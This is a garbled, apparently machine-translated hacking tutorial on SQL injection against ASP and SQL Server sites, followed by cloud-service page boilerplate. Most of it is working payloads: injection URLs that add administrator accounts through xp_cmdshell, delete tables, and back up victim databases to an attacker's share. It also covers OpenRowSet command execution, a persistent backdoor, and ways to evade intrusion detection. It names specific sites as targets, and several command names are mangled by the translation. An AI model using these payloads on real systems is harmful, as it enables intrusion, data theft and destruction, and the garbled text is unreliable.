This attack method was first originated from the 'or '1' = '1' Vulnerability (which we call as a vulnerability for the time being). I think you should know the principle of this vulnerability, execsp_addlogin Hax (add a Hax user to the database), but this method has a large limit. First, the SQL Server account used by ASP is an administrator, second, the request submission variable is at the end of the entire SQL statement, because some programmers use select * from news where id =... and topic =... and .....
If this method is used to request the database, if the above example is used, news. asp? Id = 2; Exec sp_addlogin Hax to select * from news where id = 2; Exec sp_addlogin Hax and topic =... and... after executing the storage process of sp_addlogin, the entire SQL statement has an and judgment, and the syntax is incorrect. Your sp_addlogin cannot run normally either.
Method:
News. asp? Id = 2; Exec sp_addlogin Hax ;--
The -- symbol next to it changes the judgment statement after sp_addlogin into a comment, so there will be no syntax errors. sp_addlogin can be executed normally!
Let's use them together.
News. asp? Id = 2; Exec master. DBO. sp_addlogin Hax ;--
News. asp? Id = 2; Exec master. DBO. sp_password null, Hax, Hax ;--
News. asp? Id = 2; Exec master. DBO. SP_ADDSRVROLEMEMBER SysAdmin Hax ;--
News. asp? Id = 2; Exec master. DBO. xp_cmdshell 'net user Hax/workstations: */times: All/passwordchg: yes/passwordreq: Yes
/Active: yes/add ';--
News. asp? Id = 2; Exec master. DBO. xp_mongoshell 'net localgroup administrators Hax/add ';--
In this way, you have left the Hax Administrator Account in both the database and system. Of course, the prerequisite is that ASP uses the Administrator account, so you should stop trying the virtual space, this vulnerability does not exist. In the future, we will discuss how to intrude into ASP if the other party does not use the SQL administrator account. Of course, port 1433 will also be involved. of course, you can try to add a 'symbol after Id = 2, mainly to see how the ASP of the other side is written.
What should we do when the SQL account used by the ASP program is not the administrator. For example, on the homepage of Tian Rongxin, you have the following news:
Http://www.talentit.com.cn/news/news-2.asp? Newid = 117
Can you try http://www.talentit.com.cn/news/news-2.asp? Newid = 117; select 123; -- Hehe, the syntax error is reported, select 123 error, obviously, Tian Rong new ASP in the newid variable after the end with the 'sign, then try the http://www.talentit.com.cn/news/news-2.asp? Newid = 100'; Delete news; -- Haha, I think the news library will be deleted as long as the table name is right.
The SQL account used by ASP is usually the owner of a database even if it is not the Administrator. At least the database has high management permissions.
But we don't know what the database name should do? Let's look at the db_name () function. Open your query analyzer and check out print db_name.
Similarly, declare @ A sysname; Set @ A = db_name (); backup database @ A to disk = 'your IP address, your shared directory Bak. dat ', name = 'test'; -- Hehe, his current database is backed up to your hard disk. You will understand what to do next. Similarly, this method can find the SQL IP address of the other party, first install a firewall, open the ICMP, 139tcp and 445tcp warning prompt, and then try news. asp? Id = 2; Exec master. DBO. xp_mongoshell 'Ping your IP address. If the firewall prompts someone to ping you, it is certain that ASP of the other party uses the SQL administrator privilege, at the same time, it also determines the exact location of the SQL server of the other party. Because many large websites consider performance, the Web Service is separated from the database. when the other party fails to see the source code, I think only this method can quickly locate the other SQL Server's location.
Therefore, if ASP does not have the SQL administrator permission, we cannot call xp_mongoshell. What should we do?
Don't worry, try this news. asp? Id = 2; declare @ A; Set @ A = db_name (); backup database @ A to disk = 'your IP address, your shared directory Bak. dat ', name = 'test'; -- Hehe, your firewall should have issued a warning. Someone connected to your port 445 or 139 (win9 port, the IP address of the other SQL statement can also be exposed.
What should we do if the owner of a database is not connected to the other database? Next time, I will tell you a better way.
In fact, it would be a bit exaggerated to use the backuo database to your hard disk. If the other database is very large, you can use a dial-up to access the Internet again. Next time we will talk about how to cheat IDs in executing ASP + SQL infiltration.
At present, some good IDs have begun to monitor the xp_mongoshell keywords. Okay, you can see them next time!
All the above URLs should be submitted through VBScript, because the address bar of the browser will shield some special characters, so that your command cannot completely transmit window. Location. herf = URL
Supplement: this problem has been raised on the Internet before, but it is only a few simple xp_javasshell calls that have a lot of restrictions. In fact, there are still many places worth exploring, such as www.guosen.com.cn. The certificate has this problem, and they use the layer-3 structure of MS to use the previously mentioned xp_mongoshell method, and the string will be filtered, but I tried, you can still enable the telnet service and the account of the Administrators group on the machine of the other party for heterogeneous SQL requests! Because the firewall of the other party is very strict, it is difficult to obtain its database structure to open port 80 for checkpoint data entry and exit, but there is still a way to do this: P.
By the way, I would like to remind you that sqloledb, db_name, OpenRowSet, and OpenDataSource are very useful when the SQL Server account of ASP is just a common user!
New SQL Server Vulnerabilities and some breakthroughs
Now I want to talk about some new SQL Server bugs. Although I have worked hard for a long time, I am also lucky to find out that I am afraid to be exclusive. I would like to ask you to identify them, of course, some experts may already know that, after all, I have been in contact with sqlserver for less than one year: P
1. About OpenRowSet and OpenDataSource
Maybe someone already knows this technique, that is, using OpenRowSet to send local commands.
Generally, our usage is (including msdn columns) as follows:
Select * From OpenRowSet ('sqloledb', 'myserver'; 'sa'; '', 'select * From table ')
Visible (even literally) OpenRowSet is only a quick remote database access. It must be followed by select, that is, A recordset must be returned.
So can we use it to call xp_mongoshell? The answer is yes!
Select * From OpenRowSet ('sqloledb', 'server'; 'sa '; '', 'set fmtonly off exec master. DBO. xp_mongoshell'' dir C :/''')
Set fmtonly off must be added to prevent the default setting of only returned column information. In this way, the output set returned by xp_cmdshell is submitted to the previous SELECT statement. If the default setting is used, if an empty set is returned, the SELECT statement fails and the command cannot be executed.
So if we want to call sp_addlogin, it will not return any set like xp_mongoshell, so we can no longer rely on fmtonly settings. The following operation can be performed to select * From OpenRowSet ('sqloledb ', 'server'; 'sa '; '', 'select' OK! ''Exec master. DBO. sp_addlogin hectic '). In this way, the command returns at least select' OK! ', Your machine Chamber of Commerce shows OK !, At the same time, the other database will also add a hectic account, that is, we use select 'OK! The returned set of 'spoofed the local select request. It means that the command can be executed normally. You can also perform this operation using SP_ADDSRVROLEMEMBER and OpenDataSource! As
The real use of this method is easy to think about: P
2. Two msdasql requests
I wonder if you have tried to connect to a remote database using msdasql. Of course, this API must be called by the SQL server administrator.
Select * From OpenRowSet ('msdasql ', 'driver =; server = server; address = server, 1433; uid = sa; Pwd =; database = Master; Network = dbmssocn ', 'select * From Table1 select * fromtable2 ') when the number of fields in Table1 and Table2 is different, you will find that the sqlserver of the other party crashes and local connection fails, system resources occupy everything normally. after killing the sqlserver process with pskill, if you do not restart the machine, sqlserver will either fail to start normally or often encounter illegal operations. I just happened to find this bug, I have not understood the specific cause, and it is strange that this phenomenon only occurs on msdasql, and sqloledb does not have this problem, it seems that the problem is not that the number of request sets does not match the number of returned sets, because it is still msdasql itself. For specific reasons, let's take a closer look: P
3. Terrible Backdoor
In the past, it was said on the Internet that webshells can be added to sqlserver by adding triger, jobs, or rewriting sp_addlogin and SP_ADDSRVROLEMEMBER. These methods are feasible, but they are easy to be discovered. I wonder if you have thought about the local connection ing of sqloledb. For example, if you use the Administrator account of sqlserver to execute the following command select * From OpenRowSet ('sqlodb', 'trusted _ connection = yes; Data Source = hectic ', 'set fmtonly off exec master .. xp_mongoshell ''dir C:/''') in this way, a local connection ing named hectic is created on the server of the other party. As long as sqlserver does not restart, the ing will continue to exist, at least I still don't know how to find the connection ing put by others. Well, after running the above command, you will find that even if sqlserver is a guest user without any permissions, you can also run the preceding command! And the permission is LocalSystem! (Default installation) haha! This method can be used to leave a backdoor on sqlserver, which has been intruded into and obtained administrator permissions.
The above method is passed on sqlserver2000 + sqlserver2000sp1!
* Another guess is whether you have noticed the two DSN attached to Windows by default. One is localserver and the other is msqi. When the two are created, the local administrator account is used to connect to sqlserver, if the of the other party is started through a custom power user, the SA permission is the same as that of the power user, and it is difficult to make a difference, however, we use the following command to select * From OpenRowSet ('msdasql ', 'dsn = locaserver; trusted_connection = yes', 'set fmtonly off exec master .. xp_mongoshell ''dir C:/''') should be able to use the Administrator account of localserver to connect to local sqlserver and then execute local commands with the permission of this account, after that, I think I should be able to break through the SA's power user permissions. The problem is that sqloledb cannot call the DSN connection, while msdasql is not called by the Administrator. So I am looking for guest to call the msdasql method. If someone knows how to break through this bug, or we have a new idea. We can discuss it together. If this issue can be successfully exploited by guest, it will be a very serious security vulnerability.
Because any SQL statement we mentioned above can be submitted to the other party's ASP to help us execute: P
Using T-SQL to cheat IDs or attack IDS
IDS has become increasingly intelligent.
Some IDs are added to the xp_mongoshell sp_addlogin monitoring, but after all, artificial intelligence has not appeared today. Such monitoring is always a lie. Let's talk about spoofing IDs first:
IDS monitors the xp_mongoshell keyword, so we can do this. Declare @ A sysname set @ A = "XP _" + "mongoshell" Exec @ a' dir C: /'This code is understandable to everyone. There is also xp_mongoshell, as a store procedure, which has an ID number in the master database, which is fixed. We can also do this,
Assume that this ID = 988456
Declare @ A sysname select @ A = Name from sysobjects where id = 988456 exec @ A 'dir C :/'
Of course.
Declare @ A sysname select @ A = Name from sysobjects where id = 988455 + 1 exec @ A 'dir C :/'
In this way, IDS cannot be fully monitored.
Similarly, sp_addlogin can do the same.
Let's talk about the attack IDs:
Because IDs has a large amount of data, it is usually backed up to a conventional database from day to day, such as SQL Server
Using the old recordset. addnew method will seriously affect the performance of IDS, because T-SQL requests through ADO are not only highly efficient, but some work can be handed over to SQL Server.
Normally, the program writes: Insert table values ('daily to content ',...)
So let me think about it. If you use temp ') exec xp_mongoshell 'dir C:/' --, after submission, it will become
Insert table values ('Day to content '.... 'temp ') exec xp_mongoshell 'dir C:/' -- '). In this way, xp_mongoshell can be run in IDS Database. Of course, IDS is a sniffing tool, he will capture all the reports, while the browser will change the space to % 20 when submitting, so % 20 will be submitted to SQL Server, so that your command will not be executed, the only method is insert/**/table/**/values ('Day to content '.... 'temp ')/**/exec/**/xp_cmdshell/**/'dir C :/'/**/--')
Use/**/instead of space as the delimiter so that your T-SQL can be executed in the IDS Database. Of course, other statements can be used to destroy the SQL statement, back up the IDS Database to your shared directory. Haha...
In fact, the principle of this method is the same as that of attacking ASP, but the space is changed to/**/. asp is a SELECT statement, so 'can be used to shield IDs from using insert statements, use.
Well, you can think about many other new intrusion statements. The best test tool is query analyzer.
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
